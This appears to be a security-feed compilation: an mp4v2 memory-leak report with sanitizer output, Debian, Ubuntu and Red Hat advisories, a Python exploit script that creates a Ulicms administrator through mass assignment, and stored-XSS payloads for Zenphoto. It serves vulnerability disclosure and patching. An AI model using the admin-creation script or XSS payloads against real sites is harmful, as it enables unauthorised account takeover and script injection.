mp4v2 v2.1.2 was discovered to contain a memory leak via the class MP4BytesProperty.

I found a memory leak error in _mp4property.cpp:533_; it seems that the value of the member variable _count_ is inconsistent.

**Environment**

OS: Ubuntu 18.04.6 LTS  
Compiler: gcc version 7.5.0 (Ubuntu 7.5.0-3ubuntu1~18.04)

**Compilation**

    autoreconf -i
    CC=gcc CXX=g++ CFLAGS='-fsanitize=address -g' CXXFLAGS='-fsanitize=address -g' ./configure
    make -j32
    

**Command Line**

./mp4info poc\_BytesProperty.mp4

**POC**

poc\_BytesProperty.mp4.zip

**Report**

    /home/poc/mp4v2/.libs/mp4info version 2.1.2
    /home/poc/poc_BytesProperty.mp4:
    ReadAtom: "/home/poc/poc_BytesProperty.mp4": invalid atom size, extends outside parent atom - skipping to end of "" "moov" 11495 vs 896
    Read: "/home/poc/poc_BytesProperty.mp4": Mandatory descriptor 0x0e missing
    Read: "/home/poc/poc_BytesProperty.mp4": Mandatory descriptor 0x0e missing
    Read: "/home/poc/poc_BytesProperty.mp4": Mandatory descriptor 0x0e missing
    Read: "/home/poc/poc_BytesProperty.mp4": Mandatory descriptor 0x0e missing
    Read: "/home/poc/poc_BytesProperty.mp4": Mandatory descriptor 0x0e missing
    Read: "/home/poc/poc_BytesProperty.mp4": Mandatory descriptor 0x0e missing
    Read: "/home/poc/poc_BytesProperty.mp4": Mandatory descriptor 0x0e missing
    Read: "/home/poc/poc_BytesProperty.mp4": Mandatory descriptor 0x0e missing
    Read: "/home/poc/poc_BytesProperty.mp4": Mandatory descriptor 0x0e missing
    Read: "/home/poc/poc_BytesProperty.mp4": Mandatory descriptor 0x0e missing
    Read: "/home/poc/poc_BytesProperty.mp4": Mandatory descriptor 0x0e missing
    Read: "/home/poc/poc_BytesProperty.mp4": Mandatory descriptor 0x0e missing
    Read: "/home/poc/poc_BytesProperty.mp4": Mandatory descriptor 0x0e missing
    Read: "/home/poc/poc_BytesProperty.mp4": Mandatory descriptor 0x0e missing
    Read: "/home/poc/poc_BytesProperty.mp4": Mandatory descriptor 0x0e missing
    Read: "/home/poc/poc_BytesProperty.mp4": Mandatory descriptor 0x0e missing
    Read: "/home/poc/poc_BytesProperty.mp4": Mandatory descriptor 0x0e missing
    Read: "/home/poc/poc_BytesProperty.mp4": Descriptor 0x10 has more than one instance
    ReadProperties: atom 'iods' is too small; overrun at property:  (src/mp4atom.cpp,392)
    /home/poc/mp4v2/.libs/mp4info: can't open /home/poc/poc_BytesProperty.mp4
    
    =================================================================
    ==13934==ERROR: LeakSanitizer: detected memory leaks
    
    Direct leak of 3 byte(s) in 1 object(s) allocated from:
        #0 0x7f338562db40 in __interceptor_malloc (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xdeb40)
        #1 0x7f3384fdf4ac in mp4v2::impl::MP4Malloc(unsigned long) src/mp4util.h:63
        #2 0x7f3384ff0d89 in mp4v2::impl::MP4Calloc(unsigned long) src/mp4util.h:72
        #3 0x7f338507432f in mp4v2::impl::MP4BytesProperty::MP4BytesProperty(mp4v2::impl::MP4Atom&, char const*, unsigned int, unsigned int) src/mp4property.cpp:533
        #4 0x7f33850945b7 in mp4v2::impl::MP4CreatorDescriptor::MP4CreatorDescriptor(mp4v2::impl::MP4Atom&, unsigned char) src/ocidescriptors.cpp:202
        #5 0x7f3385095061 in mp4v2::impl::CreateOCIDescriptor(mp4v2::impl::MP4Atom&, unsigned char) src/ocidescriptors.cpp:296
        #6 0x7f338500bd3a in mp4v2::impl::MP4DescriptorProperty::CreateDescriptor(mp4v2::impl::MP4Atom&, unsigned char) src/descriptors.cpp:602
        #7 0x7f33850790f5 in mp4v2::impl::MP4DescriptorProperty::AddDescriptor(unsigned char) src/mp4property.cpp:904
        #8 0x7f3385079fa8 in mp4v2::impl::MP4DescriptorProperty::Read(mp4v2::impl::MP4File&, unsigned int) src/mp4property.cpp:1019
        #9 0x7f338503bfbf in mp4v2::impl::MP4Descriptor::ReadProperties(mp4v2::impl::MP4File&, unsigned int, unsigned int) src/mp4descriptor.cpp:122
        #10 0x7f338503b77e in mp4v2::impl::MP4Descriptor::Read(mp4v2::impl::MP4File&) src/mp4descriptor.cpp:80
        #11 0x7f338507a01a in mp4v2::impl::MP4DescriptorProperty::Read(mp4v2::impl::MP4File&, unsigned int) src/mp4property.cpp:1021
        #12 0x7f338502fcc1 in mp4v2::impl::MP4Atom::ReadProperties(unsigned int, unsigned int) src/mp4atom.cpp:383
        #13 0x7f338502f056 in mp4v2::impl::MP4Atom::Read() src/mp4atom.cpp:237
        #14 0x7f338502eab9 in mp4v2::impl::MP4Atom::ReadAtom(mp4v2::impl::MP4File&, mp4v2::impl::MP4Atom*) src/mp4atom.cpp:202
        #15 0x7f3385030770 in mp4v2::impl::MP4Atom::ReadChildAtoms() src/mp4atom.cpp:435
        #16 0x7f338502f07b in mp4v2::impl::MP4Atom::Read() src/mp4atom.cpp:241
        #17 0x7f338502eab9 in mp4v2::impl::MP4Atom::ReadAtom(mp4v2::impl::MP4File&, mp4v2::impl::MP4Atom*) src/mp4atom.cpp:202
        #18 0x7f3385030770 in mp4v2::impl::MP4Atom::ReadChildAtoms() src/mp4atom.cpp:435
        #19 0x7f338502f07b in mp4v2::impl::MP4Atom::Read() src/mp4atom.cpp:241
        #20 0x7f338504098f in mp4v2::impl::MP4File::ReadFromFile() src/mp4file.cpp:457
        #21 0x7f338503d417 in mp4v2::impl::MP4File::Read(char const*, MP4FileProvider_s const*, MP4IOCallbacks_s const*, void*) src/mp4file.cpp:101
        #22 0x7f33850193e6 in MP4ReadProvider src/mp4.cpp:105
        #23 0x7f3385019389 in MP4Read src/mp4.cpp:92
        #24 0x7f338506f3f8 in MP4FileInfo src/mp4info.cpp:621
        #25 0x5597552bf97d in main util/mp4info.cpp:77
        #26 0x7f33844e4c86 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21c86)
    
    SUMMARY: AddressSanitizer: 3 byte(s) leaked in 1 allocation(s).

CVE-2023-33720: Memory Leak in MP4BytesProperty · Issue #36 · enzo1982/mp4v2

Debian Linux Security Advisory 5411-1 - Multiple issues were found in GPAC multimedia framework, which could result in denial of service or potentially the execution of arbitrary code.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5411-1                   security@debian.org  
https://www.debian.org/security/                                  Aron Xu  
May 26, 2023                          https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : gpac  
CVE ID         : CVE-2020-35980 CVE-2021-4043 CVE-2021-21852 CVE-2021-33361   
                 CVE-2021-33363 CVE-2021-33364 CVE-2021-33365 CVE-2021-33366   
                 CVE-2021-36412 CVE-2021-36414 CVE-2021-36417 CVE-2021-40559   
                 CVE-2021-40562 CVE-2021-40563 CVE-2021-40564 CVE-2021-40565   
                 CVE-2021-40566 CVE-2021-40567 CVE-2021-40568 CVE-2021-40569   
                 CVE-2021-40570 CVE-2021-40571 CVE-2021-40572 CVE-2021-40574   
                 CVE-2021-40575 CVE-2021-40576 CVE-2021-40592 CVE-2021-40606   
                 CVE-2021-40608 CVE-2021-40609 CVE-2021-40944 CVE-2021-41456   
                 CVE-2021-41457 CVE-2021-41459 CVE-2021-45262 CVE-2021-45263   
                 CVE-2021-45267 CVE-2021-45291 CVE-2021-45292 CVE-2021-45297   
                 CVE-2021-45760 CVE-2021-45762 CVE-2021-45763 CVE-2021-45764   
                 CVE-2021-45767 CVE-2021-45831 CVE-2021-46038 CVE-2021-46039   
                 CVE-2021-46040 CVE-2021-46041 CVE-2021-46042 CVE-2021-46043   
                 CVE-2021-46044 CVE-2021-46045 CVE-2021-46046 CVE-2021-46047   
                 CVE-2021-46049 CVE-2021-46051 CVE-2022-1035 CVE-2022-1222   
                 CVE-2022-1441 CVE-2022-1795 CVE-2022-2454 CVE-2022-3222   
                 CVE-2022-3957 CVE-2022-4202 CVE-2022-24574 CVE-2022-24577   
                 CVE-2022-24578 CVE-2022-26967 CVE-2022-27145 CVE-2022-27147   
                 CVE-2022-29537 CVE-2022-36190 CVE-2022-36191 CVE-2022-38530   
                 CVE-2022-43255 CVE-2022-45202 CVE-2022-45283 CVE-2022-45343   
                 CVE-2022-47086 CVE-2022-47091 CVE-2022-47094 CVE-2022-47095   
                 CVE-2022-47657 CVE-2022-47659 CVE-2022-47660 CVE-2022-47661   
                 CVE-2022-47662 CVE-2022-47663 CVE-2023-0770 CVE-2023-0818   
                 CVE-2023-0819 CVE-2023-0866 CVE-2023-1448 CVE-2023-1449   
                 CVE-2023-1452 CVE-2023-1654 CVE-2023-2837 CVE-2023-2838   
                 CVE-2023-2839 CVE-2023-2840 CVE-2023-23143 CVE-2023-23144   
                 CVE-2023-23145

Multiple issues were found in GPAC multimedia framework, whcih could result  
in denial of service or potentially the execution of arbitrary code.

For the stable distribution (bullseye), these problems have been fixed in  
version 1.0.1+dfsg1-4+deb11u2.

We recommend that you upgrade your gpac packages.

For the detailed security status of gpac please refer to  
its security tracker page at:  
https://security-tracker.debian.org/tracker/gpac

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQEzBAEBCAAdFiEEhhz+aYQl/Bp4OTA7O1LKKgqv2VQFAmRwutMACgkQO1LKKgqv  
2VQhxgf/aXBHEqvI+O12zLVGiSFBgAgP0WpynhRv+ESync2+EFNBpF/1/w0CAhVr  
mn3NWsUxj21u4Pm9YjfvG7+YXaDTaEqkrgwVknvZKwV6KY42mSEvztWfqTk5xEe1  
Hi7MUL+xKIjUblcgFxNSEAZkb/u9XO3KE7XbPKqNE+FZtz+K95Vtq7CGx+jvpa/F  
Q+e286fsay38RYsI+ESqxe8N5WYljiIph/thot/uawV6vSNYqR1te4wzn//AkDvL  
ADq4Hsr3yQSpDbPEToJwS+Q/Gd4YH7IsqtdSMWdtnrxC6Ri4zSrq+AlOvPe7xM35  
aIUZuLxhqlp6rmBBhNYefgqTiX1vdg==  
=faP5  
-----END PGP SIGNATURE-----

Debian Security Advisory 5411-1

Ubuntu Security Notice 6109-1 - Zheng Wang discovered that the Intel i915 graphics driver in the Linux kernel did not properly handle certain error conditions, leading to a double-free. A local attacker could possibly use this to cause a denial of service. Jordy Zomer and Alexandra Sandulescu discovered that the Linux kernel did not properly implement speculative execution barriers in usercopy functions in certain situations. A local attacker could use this to expose sensitive information.

==========================================================================  
Ubuntu Security Notice USN-6109-1  
May 25, 2023

linux-raspi, linux-raspi-5.4 vulnerabilities  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 20.04 LTS  
- Ubuntu 18.04 LTS

Summary:

Several security issues were fixed in the Linux kernel.

Software Description:  
- linux-raspi: Linux kernel for Raspberry Pi systems  
- linux-raspi-5.4: Linux kernel for Raspberry Pi systems

Details:

Zheng Wang discovered that the Intel i915 graphics driver in the Linux  
kernel did not properly handle certain error conditions, leading to a  
double-free. A local attacker could possibly use this to cause a denial of  
service (system crash). (CVE-2022-3707)

Jordy Zomer and Alexandra Sandulescu discovered that the Linux kernel did  
not properly implement speculative execution barriers in usercopy functions  
in certain situations. A local attacker could use this to expose sensitive  
information (kernel memory). (CVE-2023-0459)

It was discovered that the TLS subsystem in the Linux kernel contained a  
type confusion vulnerability in some situations. A local attacker could use  
this to cause a denial of service (system crash) or possibly expose  
sensitive information. (CVE-2023-1075)

It was discovered that the Reliable Datagram Sockets (RDS) protocol  
implementation in the Linux kernel contained a type confusion vulnerability  
in some situations. An attacker could use this to cause a denial of service  
(system crash). (CVE-2023-1078)

Xingyuan Mo discovered that the x86 KVM implementation in the Linux kernel  
did not properly initialize some data structures. A local attacker could  
use this to expose sensitive information (kernel memory). (CVE-2023-1513)

It was discovered that a use-after-free vulnerability existed in the iSCSI  
TCP implementation in the Linux kernel. A local attacker could possibly use  
this to cause a denial of service (system crash). (CVE-2023-2162)

It was discovered that the NET/ROM protocol implementation in the Linux  
kernel contained a race condition in some situations, leading to a use-  
after-free vulnerability. A local attacker could use this to cause a denial  
of service (system crash) or possibly execute arbitrary code.  
(CVE-2023-32269)

Duoming Zhou discovered that a race condition existed in the infrared  
receiver/transceiver driver in the Linux kernel, leading to a use-after-  
free vulnerability. A privileged attacker could use this to cause a denial  
of service (system crash) or possibly execute arbitrary code.  
(CVE-2023-1118)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 20.04 LTS:  
   linux-image-5.4.0-1085-raspi    5.4.0-1085.96  
   linux-image-raspi               5.4.0.1085.115  
   linux-image-raspi2              5.4.0.1085.115

Ubuntu 18.04 LTS:  
   linux-image-5.4.0-1085-raspi    5.4.0-1085.96~18.04.1  
   linux-image-raspi-hwe-18.04     5.4.0.1085.82

After a standard system update you need to reboot your computer to make  
all the necessary changes.

ATTENTION: Due to an unavoidable ABI change the kernel updates have  
been given a new version number, which requires you to recompile and  
reinstall all third party kernel modules you might have installed.  
Unless you manually uninstalled the standard kernel metapackages  
(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,  
linux-powerpc), a standard system upgrade will automatically perform  
this as well.

References:  
   https://ubuntu.com/security/notices/USN-6109-1  
   CVE-2022-3707, CVE-2023-0459, CVE-2023-1075, CVE-2023-1078,  
   CVE-2023-1118, CVE-2023-1513, CVE-2023-2162, CVE-2023-32269

Package Information:  
   https://launchpad.net/ubuntu/+source/linux-raspi/5.4.0-1085.96  
   https://launchpad.net/ubuntu/+source/linux-raspi-5.4/5.4.0-1085.96~18.04.1

Ubuntu Security Notice USN-6109-1

Debian Linux Security Advisory 5413-1 - An issue has been found in sniproxy, a transparent TLS and HTTP layer 4 proxy with SNI support. Due to bad handling of wildcard backend hosts, a crafted HTTP or TLS packet might lead to remote arbitrary code execution.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA256- -------------------------------------------------------------------------Debian Security Advisory DSA-5413-1                   security@debian.orghttps://www.debian.org/security/                        Thorsten AlteholzMay 26, 2023                          https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : sniproxyCVE ID         : CVE-2023-25076Debian Bug     : 1033752An issue has been found in sniproxy, a transparent TLS and HTTP layer 4proxy with SNI support. Due to bad handling of wildcard backend hosts,a crafted HTTP or TLS packet might lead to remote arbitrary codeexecution.For the stable distribution (bullseye), this problem has been fixed inversion 0.6.0-2+deb11u1.We recommend that you upgrade your sniproxy packages.For the detailed security status of sniproxy please refer toits security tracker page at:https://security-tracker.debian.org/tracker/sniproxyFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQEzBAEBCAAdFiEEhhz+aYQl/Bp4OTA7O1LKKgqv2VQFAmRwsRMACgkQO1LKKgqv2VRavQgAuKHflNXCnnu4VYTdqVME/Gkm37TyaxmrIaWliakXlQcz56ZIVBAdbko4mUgqaWBleXcSXRNe/D+9I8ugQUSVzWXNXqOcu9Z+nQzlpHpB+wQR/rMrC97Ep00NLcEELevoz20uDf6ufU+AQixYyfthvncwKcj0TFp4G4VcQboB5CocCVhlXvqEtimch/M117hfKEsD5AJWY04vXicmCqZWrtEjKUSNkZkrRKT/7u4DTkYcYgYsPBKCT0vPGf2XpWEP0bJb7vRyrPq5BnoLXJclF/t6CqD4L9MtBP1gwHPrtJQmgYdjyWm7wKvKAKXINGSUIYDZKOw/3EEkzL2tHOSxng===0CH/-----END PGP SIGNATURE-----

Debian Security Advisory 5413-1

Ulicms version 2023.1 create administrator user via mass assignment exploit.

    #Exploit Title: Ulicms 2023.1 - create admin user via mass assignment#Application: Ulicms#Version: 2023.1-sniffing-vicuna#Bugs:   create admin user via mass assignment#Technology: PHP#Vendor URL: https://en.ulicms.de/#Software Link: https://www.ulicms.de/content/files/Releases/2023.1/ulicms-2023.1-sniffing-vicuna-full.zip#Date of found: 04-05-2023#Author: Mirabbas Ağalarov#Tested on: Linux ##This code is written in python and helps to create an admin account on ulicms-2023.1-sniffing-vicunaimport requestsnew_name=input("name: ")new_email=input("email: ")new_pass=input("password: ")url = "http://localhost/dist/admin/index.php"headers = {"Content-Type": "application/x-www-form-urlencoded"}data = f"sClass=UserController&sMethod=create&add_admin=add_admin&username={new_name}&firstname={new_name}&lastname={new_name}&email={new_email}&password={new_pass}&password_repeat={new_pass}&group_id=1&admin=1&default_language="response = requests.post(url, headers=headers, data=data)if response.status_code == 200:    print("Request is success and created new admin account")    else:    print("Request is failure.!!")        #POC video : https://youtu.be/SCkRJzJ0FVk

Ulicms 2023.1 Create Administrator

Zenphoto version 1.6 suffers from multiple persistent cross site scripting vulnerabilities.

    Exploit Title: Zenphoto 1.6 - Multiple stored XSSApplication: Zenphoto-1.6 xss pocVersion: 1.6 Bugs:  XSSTechnology: PHPVendor URL: https://www.zenphoto.org/news/zenphoto-1.6/Software Link: https://github.com/zenphoto/zenphoto/archive/v1.6.zipDate of found: 01-05-2023Author: Mirabbas AğalarovTested on: Linux 2. Technical Details & POC========================================###XSS-1###steps: 1. create new album 2. write Album Description : <iframe src="https://14.rs"></iframe> 3. save and view album  http://localhost/zenphoto-1.6/index.php?album=new-album or http://localhost/zenphoto-1.6/=====================================================###XSS-2###steps: 1. go to user account and change user data (http://localhost/zenphoto-1.6/zp-core/admin-users.php?page=users)2.change postal code  as <script>alert(4)</script>3.if admin user information import as html , xss will triggerpoc video : https://youtu.be/JKdC980ZbLY

Zenphoto 1.6 Cross Site Scripting

Red Hat Security Advisory 2023-3323-01 - Go Toolset provides the Go programming language tools and libraries. Go is alternatively known as golang.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: go-toolset-1.19 and go-toolset-1.19-golang security update  
Advisory ID:       RHSA-2023:3323-01  
Product:           Red Hat Developer Tools  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:3323  
Issue date:        2023-05-25  
CVE Names:         CVE-2023-24537 CVE-2023-24538 CVE-2023-24539   
                   CVE-2023-24540 CVE-2023-29400   
=====================================================================

1. Summary:

An update for go-toolset-1.19 and go-toolset-1.19-golang is now available  
for Red Hat Developer Tools.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Developer Tools for Red Hat Enterprise Linux Server (v. 7) - noarch, ppc64le, s390x, x86_64  
Red Hat Developer Tools for Red Hat Enterprise Linux Workstation (v. 7) - noarch, x86_64

3. Description:

Go Toolset provides the Go programming language tools and libraries. Go is  
alternatively known as golang.

Security Fix(es):

* golang: html/template: improper handling of JavaScript whitespace  
(CVE-2023-24540)

* golang: go/parser: Infinite loop in parsing (CVE-2023-24537)

* golang: html/template: backticks not treated as string delimiters  
(CVE-2023-24538)

* golang: html/template: improper sanitization of CSS values  
(CVE-2023-24539)

* golang: html/template: improper handling of empty HTML attributes  
(CVE-2023-29400)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2184481 - CVE-2023-24538 golang: html/template: backticks not treated as string delimiters  
2184484 - CVE-2023-24537 golang: go/parser: Infinite loop in parsing  
2196026 - CVE-2023-24539 golang: html/template: improper sanitization of CSS values  
2196027 - CVE-2023-24540 golang: html/template: improper handling of JavaScript whitespace  
2196029 - CVE-2023-29400 golang: html/template: improper handling of empty HTML attributes

6. Package List:

Red Hat Developer Tools for Red Hat Enterprise Linux Server (v. 7):

Source:  
go-toolset-1.19-1.19.9-1.el7_9.src.rpm  
go-toolset-1.19-golang-1.19.9-1.el7_9.src.rpm

noarch:  
go-toolset-1.19-golang-docs-1.19.9-1.el7_9.noarch.rpm

ppc64le:  
go-toolset-1.19-1.19.9-1.el7_9.ppc64le.rpm  
go-toolset-1.19-build-1.19.9-1.el7_9.ppc64le.rpm  
go-toolset-1.19-golang-1.19.9-1.el7_9.ppc64le.rpm  
go-toolset-1.19-golang-bin-1.19.9-1.el7_9.ppc64le.rpm  
go-toolset-1.19-golang-misc-1.19.9-1.el7_9.ppc64le.rpm  
go-toolset-1.19-golang-src-1.19.9-1.el7_9.ppc64le.rpm  
go-toolset-1.19-golang-tests-1.19.9-1.el7_9.ppc64le.rpm  
go-toolset-1.19-runtime-1.19.9-1.el7_9.ppc64le.rpm  
go-toolset-1.19-scldevel-1.19.9-1.el7_9.ppc64le.rpm

s390x:  
go-toolset-1.19-1.19.9-1.el7_9.s390x.rpm  
go-toolset-1.19-build-1.19.9-1.el7_9.s390x.rpm  
go-toolset-1.19-golang-1.19.9-1.el7_9.s390x.rpm  
go-toolset-1.19-golang-bin-1.19.9-1.el7_9.s390x.rpm  
go-toolset-1.19-golang-misc-1.19.9-1.el7_9.s390x.rpm  
go-toolset-1.19-golang-src-1.19.9-1.el7_9.s390x.rpm  
go-toolset-1.19-golang-tests-1.19.9-1.el7_9.s390x.rpm  
go-toolset-1.19-runtime-1.19.9-1.el7_9.s390x.rpm  
go-toolset-1.19-scldevel-1.19.9-1.el7_9.s390x.rpm

x86_64:  
go-toolset-1.19-1.19.9-1.el7_9.x86_64.rpm  
go-toolset-1.19-build-1.19.9-1.el7_9.x86_64.rpm  
go-toolset-1.19-golang-1.19.9-1.el7_9.x86_64.rpm  
go-toolset-1.19-golang-bin-1.19.9-1.el7_9.x86_64.rpm  
go-toolset-1.19-golang-misc-1.19.9-1.el7_9.x86_64.rpm  
go-toolset-1.19-golang-race-1.19.9-1.el7_9.x86_64.rpm  
go-toolset-1.19-golang-src-1.19.9-1.el7_9.x86_64.rpm  
go-toolset-1.19-golang-tests-1.19.9-1.el7_9.x86_64.rpm  
go-toolset-1.19-runtime-1.19.9-1.el7_9.x86_64.rpm  
go-toolset-1.19-scldevel-1.19.9-1.el7_9.x86_64.rpm

Red Hat Developer Tools for Red Hat Enterprise Linux Workstation (v. 7):

Source:  
go-toolset-1.19-1.19.9-1.el7_9.src.rpm  
go-toolset-1.19-golang-1.19.9-1.el7_9.src.rpm

noarch:  
go-toolset-1.19-golang-docs-1.19.9-1.el7_9.noarch.rpm

x86_64:  
go-toolset-1.19-1.19.9-1.el7_9.x86_64.rpm  
go-toolset-1.19-build-1.19.9-1.el7_9.x86_64.rpm  
go-toolset-1.19-golang-1.19.9-1.el7_9.x86_64.rpm  
go-toolset-1.19-golang-bin-1.19.9-1.el7_9.x86_64.rpm  
go-toolset-1.19-golang-misc-1.19.9-1.el7_9.x86_64.rpm  
go-toolset-1.19-golang-race-1.19.9-1.el7_9.x86_64.rpm  
go-toolset-1.19-golang-src-1.19.9-1.el7_9.x86_64.rpm  
go-toolset-1.19-golang-tests-1.19.9-1.el7_9.x86_64.rpm  
go-toolset-1.19-runtime-1.19.9-1.el7_9.x86_64.rpm  
go-toolset-1.19-scldevel-1.19.9-1.el7_9.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-24537  
https://access.redhat.com/security/cve/CVE-2023-24538  
https://access.redhat.com/security/cve/CVE-2023-24539  
https://access.redhat.com/security/cve/CVE-2023-24540  
https://access.redhat.com/security/cve/CVE-2023-29400  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZG9tRtzjgjWX9erEAQjCSA/+JzEIQeKBJmyOnfKV5sZx20c+nw1vz1R0  
pqsw0rwfEvjBlIo71E4PtBPiwdN6rqaAkrxZ0R95HJC4potAiaF8Sw3ylSEO72Bc  
ODhyHA8WNBR800bxJmLJIbRiOmdS1iDXAhWKAa7CmoHPnQ9o8m6DMOKUkg78v1vb  
fOOgl842d0AAEq25RGj1OjA0SdRYYBe4SFUrZuurB5UZXuaEO6bpFqJW0TJ7bzNQ  
k8DOvNTwGSguOiAlBcbKbX8RDGkRyLMVqBBxHbfY1mCKalDma4GvlHnr680qAmtP  
isN9FEK/DhqVW09Lymvw35ok3ZW95+aKdi3jWXbVPwBCa1AXmFadNWUbVgZ17vg8  
frksYbVj8MdWgVb0k1f5HOMiDhQ/oygo4U0MOnUM8pJYcwuQ9SJbU9wTl5BfpBsX  
jIKwzE1krbTXD77yxaxNXH4EqMEM83F61MqKFPq3hd/BQSS9fXXDaEput+RfCZxX  
ZPrBCNCQo/ity03T4S6+5dFUL9M4VHGXabLhe35YWIfhgOp3DS975GaK1HlZpmvW  
UailJg3zz9i5ouZjoYyXywUnAr9r2PdwD+AE7X8CTE2rwi+f/naqDaTFFQbpsbO9  
sFOlrloPeUDw2cbxXEU6HpGm30+SFsu6gA8vLvdMDgj+gqp5T8Yu24zxSQRRZxsL  
VikMaSs72G4=  
=e8Eb  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-3323-01

Red Hat Security Advisory 2023-3319-01 - Go Toolset provides the Go programming language tools and libraries. Go is alternatively known as golang.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: go-toolset:rhel8 security update  
Advisory ID:       RHSA-2023:3319-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:3319  
Issue date:        2023-05-25  
CVE Names:         CVE-2023-24540   
=====================================================================

1. Summary:

An update for the go-toolset:rhel8 module is now available for Red Hat  
Enterprise Linux 8.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream (v. 8) - aarch64, noarch, ppc64le, s390x, x86_64

3. Description:

Go Toolset provides the Go programming language tools and libraries. Go is  
alternatively known as golang.

Security Fix(es):

* golang: html/template: improper handling of JavaScript whitespace  
(CVE-2023-24540)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2196027 - CVE-2023-24540 golang: html/template: improper handling of JavaScript whitespace

6. Package List:

Red Hat Enterprise Linux AppStream (v. 8):

Source:  
delve-1.9.1-1.module+el8.8.0+16778+5fbb74f5.src.rpm  
go-toolset-1.19.9-1.module+el8.8.0+18857+fca43658.src.rpm  
golang-1.19.9-1.module+el8.8.0+18857+fca43658.src.rpm

aarch64:  
go-toolset-1.19.9-1.module+el8.8.0+18857+fca43658.aarch64.rpm  
golang-1.19.9-1.module+el8.8.0+18857+fca43658.aarch64.rpm  
golang-bin-1.19.9-1.module+el8.8.0+18857+fca43658.aarch64.rpm

noarch:  
golang-docs-1.19.9-1.module+el8.8.0+18857+fca43658.noarch.rpm  
golang-misc-1.19.9-1.module+el8.8.0+18857+fca43658.noarch.rpm  
golang-src-1.19.9-1.module+el8.8.0+18857+fca43658.noarch.rpm  
golang-tests-1.19.9-1.module+el8.8.0+18857+fca43658.noarch.rpm

ppc64le:  
go-toolset-1.19.9-1.module+el8.8.0+18857+fca43658.ppc64le.rpm  
golang-1.19.9-1.module+el8.8.0+18857+fca43658.ppc64le.rpm  
golang-bin-1.19.9-1.module+el8.8.0+18857+fca43658.ppc64le.rpm

s390x:  
go-toolset-1.19.9-1.module+el8.8.0+18857+fca43658.s390x.rpm  
golang-1.19.9-1.module+el8.8.0+18857+fca43658.s390x.rpm  
golang-bin-1.19.9-1.module+el8.8.0+18857+fca43658.s390x.rpm

x86_64:  
delve-1.9.1-1.module+el8.8.0+16778+5fbb74f5.x86_64.rpm  
delve-debuginfo-1.9.1-1.module+el8.8.0+16778+5fbb74f5.x86_64.rpm  
delve-debugsource-1.9.1-1.module+el8.8.0+16778+5fbb74f5.x86_64.rpm  
go-toolset-1.19.9-1.module+el8.8.0+18857+fca43658.x86_64.rpm  
golang-1.19.9-1.module+el8.8.0+18857+fca43658.x86_64.rpm  
golang-bin-1.19.9-1.module+el8.8.0+18857+fca43658.x86_64.rpm  
golang-race-1.19.9-1.module+el8.8.0+18857+fca43658.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-24540  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZG9tLtzjgjWX9erEAQhJTw//bl/01d19YrHqzvTMQ9wOgIpyxxA//bnz  
DSLtDLGNjXwq+88UFLmDSTD8PLzTvIIrVqFmeLEBZrQwt9/mP18qBB9byFJHpIKQ  
6MteK+v5+/AFTW9WOJpj23JmspbNfr1HlLAYxwEkGVpD2DMGz78iAK6TmcYnYt8C  
TpfHi3HsxZb8BZi3LASyXb9KppJG38XmU1MfahQE4C1fRD2pCp94QxF0Bgy17ClT  
